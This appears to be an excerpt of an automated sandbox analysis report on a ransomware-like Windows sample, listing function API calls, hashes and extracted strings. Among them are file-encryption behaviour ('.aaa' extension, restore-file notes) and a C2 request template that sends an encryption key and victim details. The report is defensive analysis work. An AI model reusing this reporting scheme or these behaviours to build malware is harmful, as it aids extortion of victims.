                                                                                                                            • Instruction Fuzzy Hash: 31E0C272700A1395DB2D32ACCC1B2FEA85AEBD4309B6CDA1A4643DCD83DAA441808050
                                                                                                                            Function 003B21D6 Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: 71312a199818cdad98dca2d76468537e40c1af83ceb9d45bbc1a579e296ce153
                                                                                                                            • Instruction ID: 345d6e01fae156b8bdb8499159c5d3b32a6b0a309fff4eb46df3141f2dddff98
                                                                                                                            • Opcode Fuzzy Hash: 71312a199818cdad98dca2d76468537e40c1af83ceb9d45bbc1a579e296ce153
                                                                                                                            • Instruction Fuzzy Hash: B4B092A272092204EE1C22B49C2B7E5804CA6E471AB58A9564693D8896E89882804040
                                                                                                                            Function 00425203 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _doexit.LIBCMT ref: 0042520F
                                                                                                                              • Part of subcall function 004250C3: __lock.LIBCMT ref: 004250D1
                                                                                                                              • Part of subcall function 004250C3: RtlDecodePointer.NTDLL(00436EC8,00000020,0042522A,00000000,00000001,00000000,?,0042526A,000000FF,?,0042A4E2,00000011,00000000,?,00427493,0000000D), ref: 0042510D
                                                                                                                              • Part of subcall function 004250C3: DecodePointer.KERNEL32(?,0042526A,000000FF,?,0042A4E2,00000011,00000000,?,00427493,0000000D), ref: 0042511E
                                                                                                                              • Part of subcall function 004250C3: DecodePointer.KERNEL32(-00000004,?,0042526A,000000FF,?,0042A4E2,00000011,00000000,?,00427493,0000000D), ref: 00425144
                                                                                                                              • Part of subcall function 004250C3: DecodePointer.KERNEL32(?,0042526A,000000FF,?,0042A4E2,00000011,00000000,?,00427493,0000000D), ref: 00425157
                                                                                                                              • Part of subcall function 004250C3: DecodePointer.KERNEL32(?,0042526A,000000FF,?,0042A4E2,00000011,00000000,?,00427493,0000000D), ref: 00425161
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DecodePointer$__lock_doexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3343572566-0
                                                                                                                            • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                                                                                            • Instruction ID: 548c2c47f2d17c05640c9e52480acb6cd9453db5c3c05ffe2b47d80c0a4eadc1
                                                                                                                            • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                                                                                            • Instruction Fuzzy Hash: C2B0123269030C33DA202543FC03F463F1D8BC1B64F640022FA0C1E1E1A9B3B96180CD
                                                                                                                            Function 004273C6 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlEncodePointer.NTDLL(00000000,0042CCDA,0043B8B8,00000314,00000000,?,?,?,?,?,0042934B,0043B8B8,Microsoft Visual C++ Runtime Library,00012010), ref: 004273C8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EncodePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2118026453-0
                                                                                                                            • Opcode ID: 5ffc722a3da3fb8b01834c4096c76897cc306fd453106a62c14b41acc699e867
                                                                                                                            • Instruction ID: 3ccf6682ba2a6bb29ddfb9329026e533cf3d875bcac41a81282e2e487c30c143
                                                                                                                            • Opcode Fuzzy Hash: 5ffc722a3da3fb8b01834c4096c76897cc306fd453106a62c14b41acc699e867
                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                            Function 003B1D50 Relevance: 1.4, APIs: 1, Instructions: 111COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 392fec7977bcdf7483cd8ab5539ebc7518d6027962b5e4dc8ab5698ccb8e65b3
                                                                                                                            • Instruction ID: 7992b6d66ef8eb84777c307aa0986dc9df7072d72ed8f4a5128f55936d8a95e7
                                                                                                                            • Opcode Fuzzy Hash: 392fec7977bcdf7483cd8ab5539ebc7518d6027962b5e4dc8ab5698ccb8e65b3
                                                                                                                            • Instruction Fuzzy Hash: F4316D71D101399EDF1B5A64CC61FFDB636FB9070CFA48269D707AAD41DB704A009A90
                                                                                                                            Function 003B1E0F Relevance: 1.3, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(?,998B1F24), ref: 003B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction ID: 9fc23f5979f6334b29cb1758954d395bb4682e67c582c52925ce3bd9e9e1502d
                                                                                                                            • Opcode Fuzzy Hash: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction Fuzzy Hash: 7F01FE31D0012A9ADF2B5B74CC69FFDB675FB90708F548359DA4BE5941DB304A41DA40
                                                                                                                            Function 003B1E3A Relevance: 1.3, APIs: 1, Instructions: 46memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(?,998B1F24), ref: 003B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction ID: 552ae6814b4d9df99c402c343165a308e0e6fff2beae3f43ad66ac7d71d79664
                                                                                                                            • Opcode Fuzzy Hash: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction Fuzzy Hash: 3701F971D1002999EF264B30CC68FFEB635FB90708F548395DA4AE6841DB304E41DE40

                                                                                                                            Non-executed Functions

                                                                                                                            Function 0041B2C0 Relevance: 103.7, APIs: 35, Strings: 24, Instructions: 450libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetVersionExW.KERNEL32 ref: 0041B2FA
                                                                                                                            • LoadLibraryW.KERNEL32(ADVAPI32.DLL), ref: 0041B30B
                                                                                                                            • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 0041B316
                                                                                                                            • LoadLibraryW.KERNEL32(NETAPI32.DLL), ref: 0041B31F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 0041B337
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 0041B343
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0041B40D
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 0041B425
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 0041B433
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 0041B443
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0041B516
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0041B52C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseToolhelp32Snapshot), ref: 0041B538
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0041B544
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0041B550
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0041B55C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0041B568
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041B574
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041B580
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0041B58C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0041B598
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0041B5A4
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0041B5B0
                                                                                                                            • GetTickCount.KERNEL32 ref: 0041B64A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$Library$Load$Free$CountTickVersion
                                                                                                                            • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next
                                                                                                                            • API String ID: 548066447-715222291
                                                                                                                            • Opcode ID: 073c3130b0a0d99d4bef3bd7d91e81b484a493f757e71c5bcc9876510200a30d
                                                                                                                            • Instruction ID: 9b0ab41e44d741afa709f8f910670cdf3924008bcb49aeebd6d02c398950f77e
                                                                                                                            • Opcode Fuzzy Hash: 073c3130b0a0d99d4bef3bd7d91e81b484a493f757e71c5bcc9876510200a30d
                                                                                                                            • Instruction Fuzzy Hash: D8F130706043459BD720DF65CC84B9BBBF8EFC8B44F04892EF59896250DB78D984CB9A
                                                                                                                            Function 00413D10 Relevance: 73.8, APIs: 41, Strings: 1, Instructions: 321memoryfilesleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00413D7D
                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,0043CD58,?,00413CC5), ref: 00413DB5
                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0043CD58,?,00413CC5), ref: 00413DCD
                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413DE3
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413DF6
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413E64
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413E67
                                                                                                                            • ReadFile.KERNEL32 ref: 00413E8F
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00413E9A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00413EA3
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413EA6
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0043CD58,?,00413CC5), ref: 00413ED1
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413ED4
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00413EDB
                                                                                                                            • _memset.LIBCMT ref: 00413F00
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000080,00000000,?,?,?,?,?,?,?,?,?,0043CD58,?,00413CC5), ref: 00413F11
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0043CD58,?,00413CC5), ref: 00413F14
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00413F5E
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413F67
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00413F72
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413F75
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00413F78
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00413F99
                                                                                                                            • WriteFile.KERNEL32 ref: 00413FBD
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000010,00000000,00000000), ref: 00413FDD
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00413FEA
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413FF3
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 0041401E
                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 0041404A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00414056
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041405F
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000), ref: 0041406E
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00414075
                                                                                                                            • MoveFileExW.KERNEL32(?,?,00000008), ref: 00414090
                                                                                                                            • GetLastError.KERNEL32 ref: 0041409A
                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 004140AE
                                                                                                                            • Sleep.KERNEL32(00000190), ref: 004140B9
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004140DB
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004140E4
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004140EF
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004140F2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$File$Process$Free$CloseHandleWrite$AllocAttributes_memset$BuffersCreateDeleteErrorFlushLastMovePointerReadSizeSleep
                                                                                                                            • String ID: .aaa
                                                                                                                            • API String ID: 3548932551-1861201198
                                                                                                                            • Opcode ID: 68c39bcf1484232cf43de51f81eb28d9a05a29aba7d762dc59e5f6cb8473fc38
                                                                                                                            • Instruction ID: 9007e59ba22c1aaf5beb208bc48bb55982d0225d1ffcd51d997189a139798c44
                                                                                                                            • Opcode Fuzzy Hash: 68c39bcf1484232cf43de51f81eb28d9a05a29aba7d762dc59e5f6cb8473fc38
                                                                                                                            • Instruction Fuzzy Hash: 8DB19871A00218ABEB15DBA4DC89FEE777CEF5C315F00419AF609E2290DB745E848B69
                                                                                                                            Function 0041A030 Relevance: 63.4, APIs: 23, Strings: 13, Instructions: 363networkfilestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041A0B5
                                                                                                                            • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0,00000000,00000000,00000000,00000000), ref: 0041A0C6
                                                                                                                            • _memset.LIBCMT ref: 0041A0EE
                                                                                                                            • _alldiv.NTDLL(00000000,00000000,00000400,00000000), ref: 0041A16D
                                                                                                                            • _alldiv.NTDLL(00000000,?,00000400,00000000), ref: 0041A17A
                                                                                                                            • _memset.LIBCMT ref: 0041A1BC
                                                                                                                            • _memset.LIBCMT ref: 0041A21B
                                                                                                                            • _memset.LIBCMT ref: 0041A304
                                                                                                                            • _free.LIBCMT ref: 0041A38A
                                                                                                                            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0041A3B0
                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00C03380,00000000), ref: 0041A3FA
                                                                                                                            • _memset.LIBCMT ref: 0041A417
                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0041A428
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A42E
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000C16,?), ref: 0041A44B
                                                                                                                            • strstr.NTDLL ref: 0041A45E
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A472
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A475
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0041A496
                                                                                                                            • _free.LIBCMT ref: 0041A4AD
                                                                                                                            • ExitThread.KERNEL32 ref: 0041A54B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet_memset$CloseHandle$HttpOpenRequest_alldiv_free$ConnectErrorExitFileLastReadSendThreadstrstr
                                                                                                                            • String ID: $ KC$,JC$---!!!INSERTED!!!---$/inst.php?%s$/wp-content/themes/r.php?%s$2.0.4e1$GET$Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0$Subject=%s&key=%s&addr=%s&size=%lld&version=%s&OS=%ld&ID=%d&gate=%s&ip=%s&inst_id=%X%X%X%X%X%X%X%X$eirutyerg23895385tiyiruytyieye$gj$IC
                                                                                                                            • API String ID: 1974382559-2905488325
                                                                                                                            • Opcode ID: 9d594536b39e9284db085c7c5622c8f248ab59cab9e75238208731bfc2bad4b2
                                                                                                                            • Instruction ID: 54ce2dd3979e93718385dbc83f77f21fcc090a503bd1d9ebae0c96c4fc529177
                                                                                                                            • Opcode Fuzzy Hash: 9d594536b39e9284db085c7c5622c8f248ab59cab9e75238208731bfc2bad4b2
                                                                                                                            • Instruction Fuzzy Hash: 47D116B1108344AFD310DF65DC84FEBB7E8EB89348F04492EF589A7251D778A944CB6A
                                                                                                                            Function 0041ED00 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 211registrymemorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,75DC55D0,00000000), ref: 0041ED29
                                                                                                                            • RtlGetVersion.NTDLL ref: 0041ED5A
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0041ED84
                                                                                                                            • NtQueryInformationProcess.NTDLL ref: 0041EDB0
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0041EDCB
                                                                                                                            • LoadIconW.USER32 ref: 0041EE1D
                                                                                                                            • RegisterClassExW.USER32(?), ref: 0041EE34
                                                                                                                            • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 0041EE6A
                                                                                                                            • InterlockedExchange.KERNEL32(?,0041ECC0), ref: 0041EE83
                                                                                                                            • CreateWindowExW.USER32 ref: 0041EEA8
                                                                                                                            • GetStartupInfoW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EEFA
                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\system32\,?,00000104,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EF29
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Current$ClassCreateEnvironmentExchangeExpandHandleIconInfoInformationInterlockedLoadModuleProtectQueryRegisterStartupStringsVersionVirtualWindow
                                                                                                                            • String ID: $%systemroot%\system32\$0$D
                                                                                                                            • API String ID: 1361090928-3283359705
                                                                                                                            • Opcode ID: c20773353a010fabc41fdcbc50ed731b0d34950c4257898204bd5a16da5ee9e0
                                                                                                                            • Instruction ID: 338129a709ff1bd2c0cf9b040ef69aa9b4d99304f4a8b72eeefc7f337fadd0cb
                                                                                                                            • Opcode Fuzzy Hash: c20773353a010fabc41fdcbc50ed731b0d34950c4257898204bd5a16da5ee9e0
                                                                                                                            • Instruction Fuzzy Hash: 9C71C2751043419FE724DF61DC48BAB77E8FB84701F00492EFA55C72A0DB789845CB6A
                                                                                                                            Function 004139B0 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 257fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Findwcsstr$File_memset$CloseFirstNext__wcsdup_free
                                                                                                                            • String ID: IC$ L$.aaa$\*.*$recovery_file$restore_files
                                                                                                                            • API String ID: 2748371789-1963468680
                                                                                                                            • Opcode ID: f124a2b724ed578d7a5fe7d7443c07d1e6f87ba7bbfe97263d47cff39260ca7f
                                                                                                                            • Instruction ID: 8cd3bdaa977526fda1ac96882a880a1b440355606e10f584730b7f75abe76e56
                                                                                                                            • Opcode Fuzzy Hash: f124a2b724ed578d7a5fe7d7443c07d1e6f87ba7bbfe97263d47cff39260ca7f
                                                                                                                            • Instruction Fuzzy Hash: 08815BB2A0021456D720EF70DC42BEB7374EF64755F4441A6F909A6286F779ABC8C78C
                                                                                                                            Function 0041EA80 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 109memorylibrarynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00001000,00000000,00000018,?), ref: 0041EAB3
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0041EAB6
                                                                                                                            • NtQuerySystemInformation.NTDLL(0000000B,00000000,00001000,?), ref: 0041EAD1
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041EAE7
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041EAEA
                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041EB32
                                                                                                                            • _strcpy_s.LIBCMT ref: 0041EB5A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041EB68
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041EB6B
                                                                                                                            • LoadLibraryExA.KERNEL32(0000005C,00000000,00000001), ref: 0041EB7C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,PsLookupProcessByProcessId), ref: 0041EB8E
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0041EB9A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041EBB6
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041EBB9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$FreeProcess$LibrarySystem$AddressAllocDirectoryInformationLoadProcQuery_strcpy_s
                                                                                                                            • String ID: PsLookupProcessByProcessId$\
                                                                                                                            • API String ID: 2503006650-1547739243
